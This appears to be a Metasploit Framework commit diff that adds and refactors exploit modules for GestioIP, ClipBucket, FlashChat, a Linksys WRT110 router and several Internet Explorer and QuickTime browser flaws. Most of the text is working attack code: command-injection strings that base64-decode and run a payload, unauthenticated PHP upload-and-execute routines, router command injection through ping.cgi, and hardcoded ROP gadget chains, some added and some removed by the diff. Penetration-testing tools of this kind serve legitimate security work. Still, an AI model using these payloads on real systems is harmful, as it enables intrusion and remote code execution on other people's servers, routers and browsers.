'DisclosureDate' => 'Jul 12 2013',
'Privileged' => true,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSLE,
'Targets' =>
[
['Linux mipsel Payload', { } ]
],
'DefaultTarget' => 0,
))
register_options([
OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/HNAP1/'
})
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
test_login!
execute_cmdstager
end
# Sends an HTTP request with authorization header to the router
# Raises an exception unless the login is successful
def test_login!
print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
res = send_auth_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if not res or res.code == 401 or res.code == 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
else
print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
end
end
# Run the command on the router
def execute_command(cmd, opts)
send_auth_request_cgi({
'uri' => '/ping.cgi',
'method' => 'POST',
'vars_post' => {
'pingstr' => '& ' + cmd
}
})
Rex.sleep(1) # Give the device a second
end
# Helper methods
def user; datastore['USERNAME']; end
def pass; datastore['PASSWORD'] || ''; end
def send_auth_request_cgi(opts={}, timeout=nil)
timeout ||= datastore['TIMEOUT']
opts.merge!('authorization' => basic_auth(user, pass))
begin
send_request_cgi(opts, timeout)
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
end
end
end

2
modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb
View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'Neal Poole', # Vulnerability discovery 'Neal Poole', # Vulnerability discovery
'joev <jvennix[at]rapid7.com>' # Metasploit module 'joev' # Metasploit module
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>

95
modules/exploits/multi/http/gestioip_exec.rb Normal file
View File

@ -0,0 +1,95 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'GestioIP Remote Command Execution',
'Description' => %q{
This module exploits a command injection flaw to create a shell script
on the filesystem and execute it. If GestioIP is configured to use no authentication,
no password is required to exploit the vulnerability. Otherwise, an authenticated
user is required to exploit.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry' #Initial Discovery and metasploit module
],
'References' =>
[
[ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module' ]
],
'Payload' =>
{
'Space' => 475, # not a lot of room
'DisableNops' => true,
'BadChars' => "",
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic GestioIP 3.0', { }]],
'Privileged' => false,
'DisclosureDate' => 'Oct 4 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'URI', '/gestioip/']),
OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']),
OptString.new('PASSWORD', [false, 'The password to auth with', nil])
], self.class)
end
def user
datastore['USERNAME']
end
def pass
datastore['PASSWORD']
end
def use_auth
!(pass.nil? or pass.empty?)
end
def exploit
pay = Rex::Text.encode_base64(payload.encoded)
file = Rex::Text.rand_text_alpha(8)
options = {
'uri' => normalize_uri(target_uri.path, "ip_checkhost.cgi"),
'encode_params' => false,
'vars_get' => {
'ip' => "2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004",
'hostname' => "fds",
'client_id' => "1",
'ip_version' => ""
}
}
if use_auth
options.merge!('authorization' => basic_auth(user,pass))
end
res = send_request_cgi(options)
if res and res.code == 401
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Please provide USERNAME and PASSOWRD")
end
end
end

7
modules/exploits/multi/http/linksys_wrt110_cmd_exec_stager.rb
View File

@ -10,6 +10,11 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
# handle module misnomer
require 'msf/core/module/deprecated'
include Msf::Module::Deprecated
deprecated Date.new(2013, 12, 7), 'exploit/linux/http/linksys_wrt110_cmd_exec'
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho include Msf::Exploit::CmdStagerEcho
@ -23,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'Craig Young', # Vulnerability discovery 'Craig Young', # Vulnerability discovery
'joev <jvennix[at]rapid7.com>', # msf module 'joev', # msf module
'juan vazquez' # module help + echo cmd stager 'juan vazquez' # module help + echo cmd stager
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,

2
modules/exploits/osx/local/sudo_password_bypass.rb
View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Local
'Author' => 'Author' =>
[ [
'Todd C. Miller', # Vulnerability discovery 'Todd C. Miller', # Vulnerability discovery
'joev <jvennix[at]rapid7.com>', # Metasploit module 'joev', # Metasploit module
'juan vazquez' # testing/fixing module bugs 'juan vazquez' # testing/fixing module bugs
], ],
'References' => 'References' =>

118
modules/exploits/unix/webapp/clipbucket_upload_exec.rb Normal file
View File

@ -0,0 +1,118 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "ClipBucket Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in ClipBucket version 2.6 and lower.
The script "/admin_area/charts/ofc-library/ofc_upload_image.php" can be used to
upload arbitrary code without any authentication. This module has been tested
on version 2.6 on CentOS 5.9 32-bit.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gabby', # Vulnerability Discovery, PoC
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
[ 'URL', 'http://packetstormsecurity.com/files/123480/ClipBucket-Remote-Code-Execution.html' ]
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Clipbucket 2.6', {}]
],
'Privileged' => false,
'DisclosureDate' => "Oct 04 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
], self.class)
end
def uri
return target_uri.path
end
def check
# Check version
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "")
})
if res and res.code == 200 and res.body =~ /ClipBucket version (\d+\.\d+)/
version = $1
else
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Version #{version} detected")
if version > "2.6"
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
peer = "#{rhost}:#{rport}"
payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php"
print_status("#{peer} - Uploading payload [ #{payload_name} ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"),
'headers' => { 'Content-Type' => 'text/plain' },
'vars_get' => { 'name' => payload_name },
'data' => payload.encoded
})
# If the server returns 200 we assume we uploaded the malicious
# file successfully
if not res or res.code != 200 or res.body !~ /Saving your image to: \.\.\/tmp-upload-images\/(#{payload_name})/ or res.body =~ /HTTP_RAW_POST_DATA/
fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
end
register_files_for_cleanup(payload_name)
print_status("#{peer} - Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" )
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name)
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res and res.code != 200
print_error("#{peer} - Unexpected response, probably the exploit failed")
end
end
end

147
modules/exploits/unix/webapp/flashchat_upload_exec.rb Normal file
View File

@ -0,0 +1,147 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "FlashChat Arbitrary File Upload",
'Description' => %q{
This module exploits a file upload vulnerability found in FlashChat
versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload
feature in order to upload malicious PHP files without authentication
which results in arbitrary remote code execution as the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'x-hayben21', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['OSVDB', '98233'],
['EDB', '28709']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested on FlashChat version 6.0.8
[ 'Generic (PHP Payload)', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Oct 04 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to FlashChat', '/chat/'])
], self.class)
end
#
# Checks if target is running FlashChat versions 6.0.2, 6.0.4 to 6.0.8
#
def check
uri = normalize_uri(target_uri.path, '')
res = send_request_raw({'uri' => uri})
if not res
print_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end
version = res.body.scan(/<title>FlashChat v([\d\.]+)/).flatten[0] || ''
if version.empty?
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Version found: #{version}")
if version =~ /6\.0\.(2|4|5|6|7|8)/
return Exploit::CheckCode::Vulnerable
elsif version <= "6.0.8"
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
#
# Uploads our malicious file
# Stolen from havalite_upload_exec.rb
#
def upload(base)
fname = "#{rand_text_alphanumeric(rand(10)+6)}.php"
php = "<?php #{payload.encoded} ?>"
data = Rex::MIME::Message.new
data.add_part(php, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{fname}\"")
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(base, 'upload.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if not res
fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
elsif res.code.to_i == 404
fail_with(Failure::NotFound, "#{peer} - No upload.php found")
elsif res.code.to_i == 500
fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
end
return fname
end
#
# Executes our uploaded malicious file
# Stolen from havalite_upload_exec.rb
#
def exec(base, payload_fname)
res = send_request_raw({
'uri' => normalize_uri(base, 'temp', payload_fname)
})
if res and res.code == 404
fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
end
end
def exploit
base = target_uri.path
# upload
print_status("#{peer} - Uploading malicious file...")
fname = upload(base)
# register the file to clean
register_files_for_cleanup(fname)
# exec
print_status("#{peer} - Executing #{fname}...")
exec(base, fname)
end
end

37
modules/exploits/windows/browser/apple_quicktime_rdrf.rb
View File

@ -11,6 +11,7 @@ class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -62,39 +63,9 @@ class Metasploit4 < Msf::Exploit::Remote
end end
def get_payload(t) def get_payload(t)
p = '' alignment = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
rop = return p
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
p << rop
p << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
p << payload.encoded
p
end end

97
modules/exploits/windows/browser/ie_cbutton_uaf.rb
View File

@ -135,100 +135,27 @@ class Metasploit3 < Msf::Exploit::Remote
# No rop. Just return the payload. # No rop. Just return the payload.
return code if t['Rop'].nil? return code if t['Rop'].nil?
# Make post code execution more stable
code << rand_text_alpha(12000)
msvcrt_align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
java_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
rop_payload = ''
case t['Rop'] case t['Rop']
when :msvcrt when :msvcrt
case t.name case t.name
when 'IE 8 on Windows XP SP3' when 'IE 8 on Windows XP SP3'
rop_gadgets = rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
when 'IE 8 on Windows Server 2003' when 'IE 8 on Windows Server 2003'
rop_gadgets = rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77bb0c86, # XCHG EAX,ESI # RETN
0x77bc9801, # POP EBP # RETN
0x77be2265, # ptr to 'push esp # ret'
0x77bb2563, # POP EAX # RETN
0x03C0990F,
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
0x77bb48d3, # POP EBX, RET
0x77bf21e0, # .data
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
0x77bbfc02, # POP ECX # RETN
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
0x77bd8c04, # POP EDI # RETN
0x77bd8c05, # ROP NOP (-> edi)
0x77bb2563, # POP EAX # RETN
0x03c0984f,
0x77bdd441, # SUB EAX, 03c0940f
0x77bb8285, # XCHG EAX,EDX # RETN
0x77bb2563, # POP EAX # RETN
nop,
0x77be6591 # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
end end
else else
rop_gadgets = rop_payload = generate_rop_payload('java', java_align + code)
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0xffffffff,
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
# rop chain generated with mona.py
].pack("V*")
end end
rop_payload = rop_gadgets rop_payload
case t['Rop']
when :msvcrt
rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
else
rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
end
rop_payload << code
rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
return rop_payload
end end
def load_exploit_html(my_target, cli) def load_exploit_html(my_target, cli)

70
modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
View File

@ -117,76 +117,22 @@ class Metasploit3 < Msf::Exploit::Remote
def get_payload(t, cli) def get_payload(t, cli)
rop_payload = '' rop_payload = ''
# Extra junk in the end to make sure post code execution is stable.
p = payload.encoded
case t['Rop'] case t['Rop']
when :msvcrt when :msvcrt
algin = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
chain = '' rop_payload = ''
if t.name == 'IE 8 on Windows XP SP3' if t.name == 'IE 8 on Windows XP SP3'
chain = rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
elsif t.name == 'IE 8 on Windows Server 2003' elsif t.name == 'IE 8 on Windows Server 2003'
junk = rand_text_alpha(4).unpack("V")[0].to_i rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
nop = make_nops(4).unpack("V")[0].to_i
chain =
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77bb0c86, # XCHG EAX,ESI # RETN
0x77bc9801, # POP EBP # RETN
0x77be2265, # ptr to 'push esp # ret'
0x77bb2563, # POP EAX # RETN
0x03C0990F,
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
0x77bb48d3, # POP EBX, RET
0x77bf21e0, # .data
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
0x77bbfc02, # POP ECX # RETN
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
0x77bd8c04, # POP EDI # RETN
0x77bd8c05, # ROP NOP (-> edi)
0x77bb2563, # POP EAX # RETN
0x03c0984f,
0x77bdd441, # SUB EAX, 03c0940f
0x77bb8285, # XCHG EAX,EDX # RETN
0x77bb2563, # POP EAX # RETN
nop,
0x77be6591 # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
end end
rop_payload = chain + algin + payload.encoded
else else
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000 code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code << payload.encoded code << p
code << rand_text_alpha(12000) code << rand_text_alpha(12000)
rop_payload = generate_rop_payload('java', code) rop_payload = generate_rop_payload('java', code)

5
modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "Micorosft Internet Explorer SetMouseCapture Use-After-Free", 'Name' => "Microsoft Internet Explorer SetMouseCapture Use-After-Free",
'Description' => %q{ 'Description' => %q{
This module exploits a use-after-free vulnerability that currents targets Internet This module exploits a use-after-free vulnerability that currents targets Internet
Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11.
@ -49,6 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ [
[ 'CVE', '2013-3893' ], [ 'CVE', '2013-3893' ],
[ 'OSVDB', '97380' ], [ 'OSVDB', '97380' ],
[ 'MSB', 'MS13-080' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free' ] [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free' ]
@ -342,4 +343,4 @@ MSHTML!CTreeNode::GetInterface+0xd8:
66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h] 66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h]
66e13e01 ffd0 call eax 66e13e01 ffd0 call eax
=end =end

89
modules/exploits/windows/browser/ms13_055_canchor.rb
View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -109,85 +110,25 @@ class Metasploit3 < Msf::Exploit::Remote
nil nil
end end
def get_payload(t, cli) def get_payload(t)
rop = '' if t['Rop'] == :msvcrt
code = payload.encoded
esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
case t['Rop']
when :msvcrt
# Stack adjustment # add esp, -3500
esp_align = "\x81\xc4\x54\xf2\xff\xff"
print_status("Using msvcrt ROP") print_status("Using msvcrt ROP")
rop = esp_align = "\x81\xc4\x54\xf2\xff\xff"
[ rop_dll = 'msvcrt'
0x77c1e844, # POP EBP # RETN [msvcrt.dll] opts = {'target'=>'xp'}
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
else else
print_status("Using JRE ROP") print_status("Using JRE ROP")
rop = esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
[ rop_dll = 'java'
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN opts = {}
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0xffffffff,
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
# rop chain generated with mona.py
].pack("V*")
end end
rop_payload = rop p = esp_align + payload.encoded + rand_text_alpha(12000)
rop_payload << esp_align generate_rop_payload(rop_dll, p, opts)
rop_payload << code
rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
rop_payload
end
def junk
rand_text_alpha(4).unpack("V")[0].to_i
end
def nop
make_nops(4).unpack("V")[0].to_i
end end
def get_html(t, p) def get_html(t, p)
junk = rand_text_alpha(4).unpack("V")[0].to_i
js_pivot = Rex::Text.to_unescape([t['Pivot']].pack("V*")) js_pivot = Rex::Text.to_unescape([t['Pivot']].pack("V*"))
js_payload = Rex::Text.to_unescape(p) js_payload = Rex::Text.to_unescape(p)
js_align = Rex::Text.to_unescape([t['Align']].pack("V*")) js_align = Rex::Text.to_unescape([t['Align']].pack("V*"))
